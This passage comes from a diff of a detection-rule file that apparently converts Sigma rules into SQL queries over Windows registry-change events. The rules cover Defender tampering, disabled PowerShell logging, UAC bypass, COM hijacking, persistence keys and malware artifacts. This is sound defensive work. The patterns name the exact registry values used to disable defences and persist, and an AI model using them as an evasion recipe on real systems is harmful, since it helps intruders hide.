((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR 
NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewValue LIKE '%\\\\FileRepository\\\\nvmdi.inf%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\MicrosoftEdgeUpdateComRegisterShell64.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\SYSTEM32\\\\dxdiag.exe' ESCAPE '\\') OR ((NewValue LIKE 'C:\\\\Windows\\\\pyshellext.amd64.dll' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\pyshellext.dll' ESCAPE '\\')) OR ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\dnssdX.dll' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\SysWOW64\\\\dnssdX.dll' ESCAPE '\\')) OR (NewValue LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR ((NewValue LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewValue LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\%' ESCAPE '\\') OR (NewValue LIKE '%C:\\\\WINDOWS\\\\system32\\\\GamingServicesProxy.dll%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND NewValue LIKE '%C:\\\\Windows\\\\System32\\\\Autopilot.dll%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\' AND NewValue LIKE '%C:\\\\Windows\\\\System32\\\\SecurityHealth%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\InProcServer32\\\\(Default)' ESCAPE '\\')))" ], - "filename": "registry_set_rpcrt4_etw_tamper.yml" + "filename": "registry_set_persistence_search_order.yml" }, { - "title": "Disable Windows Defender Functionalities Via Registry Keys", - "id": "0eb46774-f1ab-4a74-8238-1155855f2263", + "title": "ScreenSaver Registry Key Set", + "id": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", "status": "experimental", - "description": "Detects when attackers or 
tools disable Windows Defender functionalities via the windows registry", - "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", + "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.011" ], "falsepositives": [ - "Administrator actions" + "Legitimate use of screen saver" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND 
NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE%' ESCAPE '\\' AND NewValue LIKE '%.scr' ESCAPE '\\') AND NOT ((NewValue LIKE '%C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_windows_defender_tamper.yml" + "filename": "registry_set_scr_file_executed_by_rundll32.yml" }, { - "title": "PowerShell as a Service in Registry", - "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", - "status": "test", - "description": "Detects that a powershell code is written to the registry as a service.", - "author": "oscd.community, Natalia Shornikova", + "title": "PowerShell Logging Disabled Via Registry Key Tampering", + "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", + "status": "experimental", + "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE 
'\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "registry_set_powershell_as_service.yml" + "filename": "registry_set_powershell_logging_disabled.yml" }, { - "title": "Outlook Macro Execution Without Warning Setting Enabled", - "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", - "status": "test", - "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", - "author": "@ScoubiMtl", + "title": "Allow RDP Remote Assistance Feature", + "id": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", + "status": "experimental", + "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the feature (alerts should be investigated either way)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\fAllowToGetHelp' ESCAPE '\\' 
AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "registry_set_office_outlook_enable_macro_execution.yml" + "filename": "registry_set_allow_rdp_remote_assistance_feature.yml" }, { - "title": "Bypass UAC Using DelegateExecute", - "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", - "status": "test", - "description": "Bypasses User Account Control using a fileless method", + "title": "Potential Persistence Using DebugPath", + "id": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "status": "experimental", + "description": "Detects potential persistence using Appx DebugPath", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND NewValue = '(Empty)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ActivatableClasses\\\\Package\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\DebugPath' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PackagedAppXDebug\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\')))" ], - "filename": "registry_set_bypass_uac_using_delegateexecute.yml" + "filename": "registry_set_persistence_appx_debugger.yml" }, { - "title": "CurrentVersion NT Autorun Keys Modification", - "id": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "title": "Potential Persistence Via Outlook Today Pages", + "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", "status": "experimental", - 
"description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547.001" + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\VmApplet%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Taskman%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GpExtensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AppSetup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AlternateShells\\\\AvailableShells%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\IconServiceLib%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Font Drivers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Load%' ESCAPE '\\')) AND NOT ((NewValue = 
'(Empty)') OR (TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\DisableExceptionChainValidation' ESCAPE '\\' OR TargetObject LIKE '%\\\\MitigationOptions' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\ClickToRunStore\\\\HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\PreviousPolicyAreas%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\MaxNoGPOListChangesInterval%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000009)', 'DWORD (0x000003c0)')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Delete Cached Update Binary' ESCAPE '\\' AND 
NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe\"' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml" + "filename": "registry_set_persistence_outlook_todaypage.yml" }, { - "title": "Registry Hide Function from User", - "id": "5a93eb65-dffa-4543-b761-94aa60098fb6", - "status": "test", - "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", + "title": "Registry Disable System Restore", + "id": "5de03871-5d46-4539-a82d-3aa992a69a83", + "status": "experimental", + "description": "Detects the modification of the registry to disable a system restore on the computer", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate admin script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 
'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideClock' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAHealth' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCANetwork' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAPower' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAVolume' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowInfoTip' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowCompColor' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "registry_set_hide_function_user.yml" + "filename": "registry_set_disable_system_restore.yml" }, { - "title": "Potential Persistence Using DebugPath", - "id": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "title": "Potential Qakbot Registry Activity", + "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", "status": "experimental", - "description": "Detects potential persistence using Appx DebugPath", - "author": "frack113", + "description": 
"Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", + "author": "Hieu Tran", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ActivatableClasses\\\\Package\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\DebugPath' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PackagedAppXDebug\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" ], - "filename": "registry_set_persistence_appx_debugger.yml" + "filename": "registry_event_malware_qakbot_registry.yml" }, { - "title": "Change User Account Associated with the FAX Service", - "id": "e3fdf743-f05b-4051-990a-b66919be1743", - "status": "experimental", - "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", - "author": "frack113", + "title": "Disable Security Events Logging Adding Reg Key MiniNt", + "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", + "status": "test", + "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ "attack.defense_evasion", + "attack.t1562.001", "attack.t1112" ], "falsepositives": [ 
@@ -33546,1169 +33295,1278 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (NewValue LIKE '%NetworkService%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" ], - "filename": "registry_set_fax_change_service_user.yml" + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" }, { - "title": "Disable Windows Security Center Notifications", - "id": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", - "status": "experimental", - "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", - "author": "frack113", + "title": "Registry Entries For Azorult Malware", + "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "status": "test", + "description": "Detects the presence of a registry key created during Azorult execution", + "author": "Trent Liffick", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Windows\\\\CurrentVersion\\\\ImmersiveShell\\\\UseActionCenterExperience' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 
'Existing registry value modified') AND Channel = 'Security' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" ], - "filename": "registry_set_disable_security_center_notifications.yml" + "filename": "registry_event_mal_azorult.yml" }, { - "title": "Enable Microsoft Dynamic Data Exchange", - "id": "63647769-326d-4dde-a419-b925cc0caf42", + "title": "DLL Load via LSASS", + "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", "status": "test", - "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", - "author": "frack113", + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1559.002" + "attack.persistence", + "attack.t1547.008" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\Word\\\\Security\\\\AllowDDE' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLaunch' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLookup' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND 
(NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" ], - "filename": "registry_set_office_enable_dde.yml" + "filename": "registry_event_susp_lsass_dll_load.yml" }, { - "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", - "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", - "status": "experimental", - "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Run Key from Download", + "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "status": "test", + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.t1547.001" ], "falsepositives": [ - "Probable legitimate applications. 
If you find these please add them to an exclusion list" + "Software installers downloaded and used by users" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%appdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" + "filename": "registry_event_susp_download_run_key.yml" }, { - "title": 
